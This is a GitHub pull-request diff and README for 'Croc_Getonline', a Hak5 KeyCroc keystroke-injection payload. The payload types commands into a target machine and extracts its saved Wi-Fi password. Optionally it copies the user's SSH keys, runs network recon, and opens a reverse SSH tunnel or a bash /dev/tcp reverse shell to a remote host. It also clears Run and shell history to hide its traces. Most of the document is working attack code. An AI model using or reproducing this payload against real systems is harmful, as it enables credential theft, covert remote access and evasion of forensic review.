Merge pull request #62 from spywill/master

update
master
Peaks 2024-08-29 03:55:06 -04:00 committed by GitHub
commit 21c450010b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
4 changed files with 574 additions and 105 deletions


@ -1,118 +1,468 @@
# Title: Croc_Getonline # Title: Croc_Getonline
# Description: Attempt to connect Keycroc automatically to target wifi access point # Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
# Author: spywill # Author: spywill
# Version: 3.5 # Version: 4.3
# Category: Key Croc # Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
MATCH (getonline_W|getonline_R|getonline_L) # getonline_W <-- MATCH word for windows, Attempt connection to access point
# getonline_L <-- MATCH word for Linux, Attempt connection to access point
# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point
# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD )
# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID
# getonline_K <-- MATCH word for killing keycroc wlan0 interface
# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE
# getonline_H <-- MATCH word for entering ATTACKMODE HID
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) # option=0 Run payload as normal
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done # option=1 Run payload as normal, open terminal on target
# option=2 Run payload as normal, start reverse SSH tunnel using SSH
# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT
# option=4 Run payload as normal, open web page
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt MATCH getonline+_[A-Z]{1}
QUACK LOCK
if [ -f $wifi_pass ]; then #---> Edit payload option below
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt option=0
rm -f $wifi_pass keycroc_password=hak5croc
wifi_pass=/tools/wifipass.txt
web_page=https://forums.hak5.org/
#---> Edit remote host below
remote_user_name=EDIT_REMOTE_USERNAME_HERE
remote_host_ip=EDIT_REMOTE_HOST_IP_HERE
remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE
port=7000
#---> Edit known SSID and password below
known_ssid=EDIT_KNOWN_SSID_HERE
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
#---> Edit recon scan on/off below & nmap
recon=off
nmap_scan="nmap -T4 -F"
recon_loot=/root/udisk/tools/Target_SSID.txt
#---> Edit ICMP/PORT alert on/off below & iptables time out
alert=off
alert_time=60
#---> Edit target password below
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
target_password=ENTER_TARGET_PASSWORD_HERE
fi fi
ATTACKMODE HID STORAGE recon_scan() {
Q DELAY 5000 if [ "$recon" = "on" ]; then
LED ATTACK if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :"
QUACK ENTER
QUACK DELAY 2000
else
:
fi
elif [ "$recon" = "off" ]; then
:
else
:
fi
}
ENTER_STORAGE() {
if [ -f ~/udisk$wifi_pass ]; then
cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt
rm -f ~/udisk$wifi_pass
fi
ATTACKMODE HID STORAGE
QUACK DELAY 5000
LED ATTACK
}
RESET_PAYLOAD() {
QUACK UNLOCK
sleep 5 ; LED OFF
killall -9 bash
killall -9 python
sleep 1
RELOAD_PAYLOADS
}
CLEAN_UP() {
if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "history -c ; rm -f ~/.bash_history"
QUACK ENTER
QUACK DELAY 2000
else
:
fi
}
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
}
case $LOOT in case $LOOT in
getonline_W) getonline_W)
Q GUI r ENTER_STORAGE
Q DELAY 3000 QUACK GUI r
Q STRING "powershell -NoP -NonI -W Hidden" QUACK DELAY 3000
Q ENTER QUACK STRING "powershell -NoP -NonI -W Hidden"
Q DELAY 5000 QUACK ENTER
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" QUACK DELAY 5000
Q ENTER QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
Q DELAY 3000 QUACK ENTER
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" QUACK DELAY 3000
Q ENTER QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
Q DELAY 2000 QUACK ENTER
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" QUACK DELAY 2000
Q ENTER QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
Q DELAY 2000 QUACK ENTER
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" QUACK DELAY 2000
Q ENTER QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\""
Q DELAY 5000 QUACK ENTER
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" QUACK DELAY 5000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_R) getonline_R)
Q CONTROL-ALT-d ENTER_STORAGE
Q CONTROL-ALT-t QUACK CONTROL-ALT-d
Q DELAY 2000 QUACK CONTROL-ALT-t
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" QUACK DELAY 2000
Q ENTER QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
Q DELAY 2000 QUACK ENTER
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" QUACK DELAY 2000
Q ENTER QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q DELAY 2000 QUACK ENTER
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" QUACK DELAY 2000
Q ENTER QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
Q DELAY 2000 QUACK ENTER
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" QUACK DELAY 2000
Q ENTER QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass"
Q DELAY 3000 QUACK ENTER
Q STRING "umount \$MOUNT_POINT ; exit" QUACK DELAY 3000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "umount \$MOUNT_POINT ; exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_L) getonline_L)
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then ENTER_STORAGE
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "$target_password"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass"
QUACK ENTER
QUACK DELAY 3000
recon_scan
CLEAN_UP
QUACK STRING "sudo umount \$MOUNT_POINT ; exit"
QUACK ENTER
ATTACKMODE HID
;;
getonline_N)
LED B
sleep 2
echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass
;;
getonline_F)
if [ -f ~/udisk$wifi_pass ]; then
LED B
sleep 2
else else
PC_PW=LINUX LED R
RESET_PAYLOAD
fi fi
Q CONTROL-ALT-d ;;
Q ALT-t getonline_K)
Q DELAY 2000 LED R
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" ifconfig wlan0 down
Q ENTER RESET_PAYLOAD
Q DELAY 2000 ;;
Q STRING "$PC_PW" getonline_S)
Q ENTER ATTACKMODE HID STORAGE
Q DELAY 2000 sleep 3
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" RESET_PAYLOAD
Q ENTER ;;
Q DELAY 2000 getonline_H)
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" ATTACKMODE HID
Q ENTER sleep 3
Q DELAY 2000 RESET_PAYLOAD
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" ;;
Q ENTER getonline_P)
Q DELAY 3000 ATTACKMODE HID SERIAL
Q STRING "sudo umount \$MOUNT_POINT ; exit" sleep 3
Q ENTER RESET_PAYLOAD
;;
getonline_A)
ATTACKMODE HID AUTO_ETHERNET
sleep 3
RESET_PAYLOAD
;;
getonline_X)
LED R
rm -f /root/udisk/payloads/Croc_getonline.txt
rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt
rm -f $recon_loot root/udisk/config.txt
rm -f /root/udisk/tools/firewall-rules-backup.txt
rm -r /root/udisk/tools/Target_SSH_KEY
apt -y remove sshpass
reboot --force
RESET_PAYLOAD
;;
getonline_T)
if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
fi
if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
fi
killall -9 tcpdump
sleep 1
else
:
fi
RESET_PAYLOAD
;;
*)
LED R
sleep 1
LED OFF
RESET_PAYLOAD
;; ;;
esac esac
ATTACKMODE HID
sleep 3 sleep 3
LED SETUP word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w)
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) if [[ $word_count -eq 2 ]]; then
ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)"
matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"
sleep 1
if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then
LED SETUP
else
LED R
RESET_PAYLOAD
fi
else
LED R
RESET_PAYLOAD
fi
kill -9 $(pidof wpa_supplicant)
kill -9 $(pidof dhclient)
ifconfig wlan0 down ifconfig wlan0 down
if [ "$LOOT" = "getonline_W" ]; then if [ "$LOOT" = "getonline_W" ]; then
sed -i '0,/./s/^.//' $wifi_pass sed -i '0,/./s/^.//' ~/udisk$wifi_pass
sed -i 's/\r//g' $wifi_pass sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass
sed -i 's/\r//g' ~/udisk$wifi_pass
fi fi
sed -i 's/\( \)*/\1/g' $wifi_pass sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf
dhclient wlan0
sleep 3 sleep 3
systemctl restart ssh.service systemctl restart ssh.service
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R if : >/dev/tcp/8.8.8.8/53; then
if [ $option -eq 0 ]; then
:
elif [ $option -eq 1 ]; then
case "$LOOT" in
getonline_W)
QUACK GUI m
QUACK GUI r
QUACK DELAY 2000
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 5000
;;
getonline_R)
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
;;
getonline_L)
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
;;
esac
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "$keycroc_password"
QUACK ENTER
elif [ $option -eq 2 ]; then
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
[ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass
sleep 1
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
sleep 1
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 3
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
else
LED R
sleep 1
fi
elif [ $option -eq 3 ]; then
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
/bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 &
else
LED R
sleep 1
fi
elif [ $option -eq 4 ]; then
if [ "$LOOT" = "getonline_W" ]; then
QUACK GUI d
QUACK GUI r
QUACK DELAY 2000
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Start-Process $web_page & exit"
QUACK ENTER
elif [ "$LOOT" = "getonline_R" ]; then
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
QUACK STRING "xdg-open $web_page & exit"
QUACK ENTER
elif [ "$LOOT" = "getonline_L" ]; then
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
QUACK STRING "xdg-open $web_page & exit"
QUACK ENTER
fi
else
LED FINISH
fi
LED FINISH
else
LED R
fi
if [ "$recon" = "on" ]; then
LED C SLOW
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass)
iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot
echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
cat /etc/resolv.conf | grep nameserver >> $recon_loot
perform_nmap_scan() {
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
$nmap_scan $network_range >> $recon_loot
}
calculate_network_range
perform_nmap_scan
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
echo -ne "\n\n" >> $recon_loot
elif [ "$recon" = "off" ]; then
:
else
:
fi
if [ "$alert" = "on" ]; then
icmp_alert() {
calculate_network_range
sleep 1
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do
:
done
LED R SLOW
iptables -F
iptables -A OUTPUT -p icmp --icmp-type any -j DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
}
port_alert() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
file=/tmp/tcpdump.out
until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
:
done
LED R SLOW
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
port_alert & echo -ne $! > /tmp/port_pid.txt
}
iptables-save > /root/udisk/tools/firewall-rules-backup.txt
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
port_alert & echo -ne $! > /tmp/port_pid.txt
LED B
elif [ "$alert" = "off" ]; then
:
else
:
fi
sleep 3 sleep 3
LED OFF LED OFF
QUACK UNLOCK
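Review bot: The header comment on the new side names only tools/wifipass.txt, tools/old_wifipass.txt and Target_SSID.txt as outputs, but the added code has further side effects on both the host and the device that are not documented. With `recon=on`, `recon_scan` copies the contents of the user's `~/.ssh` to `tools/Target_SSH_KEY`, and `CLEAN_UP`, called in the W, R and L branches, clears RunMRU and the PSReadLine history file on Windows or `~/.bash_history` on Linux. On the device the script overwrites `/etc/wpa_supplicant.conf`, and with `alert=on` it flushes iptables and writes `/tmp/icmp_pid.txt`, `/tmp/port_pid.txt` and `/tmp/tcpdump.out`. I would list these in the header so that anyone auditing a run knows which artifacts and host changes to account for, e.g. `# Side effects: copies ~/.ssh to tools/Target_SSH_KEY (recon=on); clears host Run/shell history; rewrites /etc/wpa_supplicant.conf; alert=on flushes iptables`.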


@ -1,8 +1,9 @@
# Croc_Getonline # Croc_Getonline
## INTRODUCTION : ## INTRODUCTION :
- This project is developed for the HAK5 KeyCroc - This project is developed for the HAK5 KeyCroc.
- Attempt to connect Keycroc automatically to target wifi access point. - Attempt to connect Keycroc automatically to target wifi access point. OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel.
- Payload will use KeyCroc MATCH command to perform specific tasks.
* **TESTED ON** * **TESTED ON**
- Windows 10 - Windows 10
@ -12,29 +13,99 @@
## INSTALLATION : ## INSTALLATION :
- Enter arming mode on your keycroc to install file. - Enter arming mode on your keycroc to install file.
- Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder** - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**.
## STARTING GETONLINE : ## STARTING CROC_GETONLINE :
- After install plug into target and type in anywhere After install plug into target and type in anywhere:
- **getonline_W** <-- MATCH word for windows - **`getonline_W`** MATCH word for windows, Attempt connection to wifi access point
- **getonline_L** <-- MATCH word for Linux - **`getonline_L`** MATCH word for Linux, Attempt connection to wifi access point
- **getonline_R** <-- MATCH word for Raspberry pi - **`getonline_R`** MATCH word for Raspberry pi, Attempt connection to wifi access point
- When the payload is done running the LED will light up green - **`getonline_N`** MATCH word for connecting to known SSID ( EDIT PAYLOAD )
- Keycroc should now be connected to target wifi access point - **`getonline_F`** MATCH word for reset wlan0 interface to last known SSID
- NOTE: for linux edit payload for passwd needed for sudo permission - **`getonline_K`** MATCH word for killing keycroc wlan0 interface
- **`getonline_S`** MATCH word for entering ATTACKMODE HID STORAGE
- **`getonline_H`** MATCH word for entering ATTACKMODE HID
- **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL
- **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
- **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot
- **`getonline_T`** MATCH word for Stopping ICMP/PORT alert
* **LED STATUS**
- **`LED WHITE`** Entering ATTACKMODE
- **`LED ATTACK`** Retrieving wifi access point credentials
- **`LED SETUP`** Configuring keycroc wlan0 interface to wifi access point
- **`LED GREEN`** Successful connection to wifi access point
- **`LED RED`** Payload failed
- **`LED CYAN`** Performing recon scan
- **`LED RED FLASH`** ICMP/PORT alert
**NOTE:** for linux edit payload for password needed for sudo permission.
## PAYLOAD OPTIONS :
Editing payload variable options:
- **`option=0`**
- This option will run payload as normal, attempt to connect Keycroc to wifi access point.
- **`option=1`**
- This option will run payload as normal, after a successful connection open terminal on target and start ssh session.
- ( EDIT PAYLOAD FOR KEYCROC PASSWORD )
- **`option=2`**
- This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH.
- ( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" )
- SSHPASS is a requirement for this option, payload will attempt to install if not installed.
- **`option=3`**
- This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat.
- ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" )
- **`option=4`**
- This option will run payload as normal, after a successful connection open default browser and start web page.
- ( EDIT PAYLOAD FOR WEB SITE DEFAULT https://forums.hak5.org )
* **Configuring RECON scan with recon=on and recon=off**
The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl.
- **`recon=off`**
- Suppresses active reconnaissance to maintain stealth.
- Useful for discreet scanning in sensitive environments.
- **`recon=on`**
- Initiates basic network reconnaissance scans.
- Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt.
* **Configuring ICMP and Port Alerts with alert=on and alert=off**
- **`alert=on`**
- ICMP Alert: It blocks outgoing ICMP and UDP packets with specific destination ports (33434 and 33534) for a minute and then restores the original firewall rules.
- Port Alert: It drops incoming TCP packets with the SYN flag set for a minute and then restores the original firewall rules.
- **`alert=off`**
- If alert is set to off, the script does nothing ( : represents a null command in bash ). No alerts are set up.
To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions, respectively. It saves the current firewall rules to a backup file and runs the alert functions in the background, storing their respective PIDs in temporary files. If alert=off, the script does nothing related to alerts.
## PAYLOAD INFO : ## PAYLOAD INFO :
**PowerShell script that performs the following actions:** - **PowerShell script that performs the following actions:**
Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet. Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet.
Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet. Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT and exits the script.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT. - **Bash script that performs the following actions:**
Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script.
**Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc. Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc.
Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID. Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
@ -42,7 +113,7 @@ Gets the password for the current wireless network by searching for the SSID in
Writes the SSID and password to a file located at $MOUNT_POINT using tee. Writes the SSID and password to a file located at $MOUNT_POINT using tee.
Unmounts the volume at $MOUNT_POINT using umount, and exits the script. Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
**Bash script that performs the following actions:** - **Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb. Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb.
Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist. Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist.
@ -54,24 +125,24 @@ Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc". Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc".
**-Sed command that performs the following actions:** - **Sed command that performs the following actions:**
By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus: By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus:
1{x;s#^#sed -n 1p wifipass.txt#e;x} - 1{x;s#^#sed -n 1p wifipass.txt#e;x}
1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s 1{..} executes the commands between the ellipses on the first line of wifipass.txt. Commands are separated by ;'s
x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space. x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space.
